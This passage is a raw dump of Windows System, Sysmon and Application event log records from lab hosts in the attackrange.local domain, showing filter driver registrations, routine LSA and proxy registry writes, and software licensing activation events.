614000x8000400000000000167377Systemar-win-dc.attackrange.local0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-000C-0000-6B03-F022905BDA01} 614000x8000400000000000167376Systemar-win-dc.attackrange.local0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-000B-0000-BF3E-EB22905BDA01} 614000x8000400000000000167372Systemar-win-dc.attackrange.local0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-000A-0000-DA52-DF22905BDA01} 13241300x800000000000000067318Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-09 19:42:33.073{7A09209E-8028-65C6-0B00-000000004803}588C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000167082Systemar-win-2.attackrange.local0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-000A-0000-FC41-5920905BDA01} 614000x8000400000000000167081Systemar-win-2.attackrange.local0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0009-0000-BEDF-5620905BDA01} 614000x8000400000000000167080Systemar-win-2.attackrange.local0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0008-0000-BD7D-5420905BDA01} 614000x8000400000000000167333Systemar-win-dc.attackrange.local0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0007-0000-098B-831E905BDA01} 614000x8000400000000000167332Systemar-win-dc.attackrange.local0x01009DfsDriver2023-05-05T02:33:31.000000000Z184{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "Filter" , "instances" : [["405000","0x00000001"]] }{02000000-0006-0000-A68C-641E905BDA01} 614000x8000400000000000167331Systemar-win-dc.attackrange.local0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0005-0000-0C2A-621E905BDA01} 614000x8000400000000000167329Systemar-win-dc.attackrange.local0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0003-0000-4F0C-A11D905BDA01} 614000x8000400000000000167328Systemar-win-dc.attackrange.local0x01006DfsrRo2016-07-16T02:20:37.000000000Z203{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Content Screener" , "instances" : [["261100","0x00000000"]] }{02000000-0002-0000-4F0C-A11D905BDA01} 614000x8000400000000000167327Systemar-win-dc.attackrange.local0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-B2A9-9E1D905BDA01} 614000x8000400000000000167038Systemar-win-2.attackrange.local0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-43B8-411D905BDA01} 614000x8000400000000000167037Systemar-win-2.attackrange.local0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-6440-2C1D905BDA01} 614000x8000400000000000167035Systemar-win-2.attackrange.local0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-9147-0D1D905BDA01} 614000x8000400000000000167034Systemar-win-2.attackrange.local0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-73E3-0A1D905BDA01} 13241300x800000000000000064842Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-09 06:19:52.733{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000067241Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-09 03:58:40.017{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000064611Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-08 20:25:41.275{03D06954-38C4-65C5-39EE-000000004703}1912C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000064610Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-08 20:25:41.259{03D06954-38C5-65C5-3AEE-000000004703}5244C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000061383Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-08 20:25:02.443{7A09209E-389D-65C5-0FEF-000000004703}3776C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000061382Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-08 20:25:02.412{7A09209E-389E-65C5-10EF-000000004703}4828C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 100304000x8000000000000023432Applicationar-win-2.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259200)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 100304000x8000000000000023420Applicationar-win-2.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259200)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 1228904000x8000000000000023416Applicationar-win-2.attackrange.local0x00000000, 0x00000000, 1, 0, 50, 120, 10080, 2024/02/08 20:240000060094573D14FC6DB064B03EAEACA213664B06CA0A5DDA8FC069501055779E8372F936E165063429FD4B14373BC30369BA154BFF0D4EDD5DED6D48C65964A2E076B817D984AE64ED8B72B01AA695D153801CBAA097A8D4E925DF9BA03BCFEC16E21F54E3B07FC1887962A82B278FE6B7C5E732E3AE9E79561A4BAFF804774A1F992E06FCA31495E8E811CFE2EEA92F3937D3F766E2FF60DEE8A6CC29F29171C8D139A6144576CA62247C8FE5520A460D11EDFD5B98ECE359A061EDBA1B9C3F2AA8F2D85D1396BE4185D443209DF529034B439C336EDA38B61DB656A9B737BD9C827283CC82065CBB4815CB898B2A4067F660DF1920FB07C9A94DE8D70941EE9B34E2 1228804000x8000000000000023415Applicationar-win-2.attackrange.local0x00000000, 0x00000000, 169.254.169.251:1688, 0c6dd942-01a4-42fc-94f0-19499fab6e05, 2024/02/08 20:24, 0, 1, 249120, 21c56779-b449-4d20-adfc-eece0e1ad74b, 5000006002E0259812D3F2ED384AD23DA08E472FA488C7C0F96E8972ABDC803D914B7623500B5CAC3A42F05CD931EE77283E8F7EB9F6EAB00F00DC9323E275B4AE3400BF1261BD39279BCD5E240026205A692873F706D12F856F9E94D0462A40758297F6F8DC1CCDA3B2C2A8B7EB7426B08D49D0AD42A0C25A8B47027121F9F5B578E045AA5852158E3BB42C953704E5EDBA0C5F5E5513A8EA0F1C3670E873C14E54D54D583224DBA807210DEC31D08229DB1260F18BF46341B251061A2D8F763DC9AC4E0506511373CA5E746209ABFF786035C7586DBB1C4AEED4D47F83CF32FF785991C8DEB19833C24597CA92D400B0A9C751C4B9EAFD033395550BD07EA4594E54B36 100304000x8000000000000023467Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259200)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 100304000x8000000000000023466Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259200)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 1228904000x8000000000000023462Applicationar-win-dc.attackrange.local0x00000000, 0x00000000, 1, 0, 50, 120, 10080, 2024/02/08 20:2400000600B1934B17C1828F16DE04D426BEE0E80990B41246749F28AD3E41818398E79E5D6A3D4D6EE01C0639FD1D02190E931C65F03512AD2685CDF3905DED53113A4895C424B0B7DEBCD1022D2362885D5232E9EE1E6B3C997D316E1B77040AF9F3288C6A3086600084038894D95BB99BD4AB6F723516D58F8DD31EEF79FFD7686A3279CDB2DBC6A4958D5D05EA076993D0EC40125AFB21FCC30AD5BD88BD3DF8967182AF1331CB5354F5F05D600804FE6938B66AB6BEA0AC66BAC578C7F31B8D86381542D24EA636AEC86500C864979C77FA694FF0D620C1777A5F21D217056EA33A9DE0354FE717B35F0E55C64891610B0E18E65782D70F3A7E219289D5245531BB14 1228804000x8000000000000023461Applicationar-win-dc.attackrange.local0x00000000, 0x00000000, 169.254.169.250:1688, e58d5b76-1fd0-47d7-8d22-909a6464183a, 2024/02/08 20:24, 0, 1, 249120, 21c56779-b449-4d20-adfc-eece0e1ad74b, 500000600DB1547113A2412A2651B1F9614310C8AD350B65C34B0AC989F6F5C91B85F8B3AD51E9845538870AB11EB1A68F576216565364857743B9B431F86B2A29EEC64CF2B72B612EB97A3488A7630EC24652C699D9E1938245228F41F8400375737570C276DD567F2835D74EFA1F42E82E0D8C2FDBA05EB3621CC7E287D81111D61CB55A83CA48207774AB3690989F5901F78B5A14CEBBD6DEF650095582563370CD9EA1ED011C80612D1DFF3F49E92EAB3A5ED3D2664379E05BA919F09FE741D654441E2254EC94D1497099CDE7DB9633C393B50FEADD608C51297A5E1BC1CAC075807128D8228E6236957DF65AB099AFA5F5F4837E0A91671CA42EB799EC96C04BD26 100304000x8000000000000023411Applicationar-win-2.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 0 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 249121)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023404Applicationar-win-2.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 100304000x8000000000000023457Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 249121)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 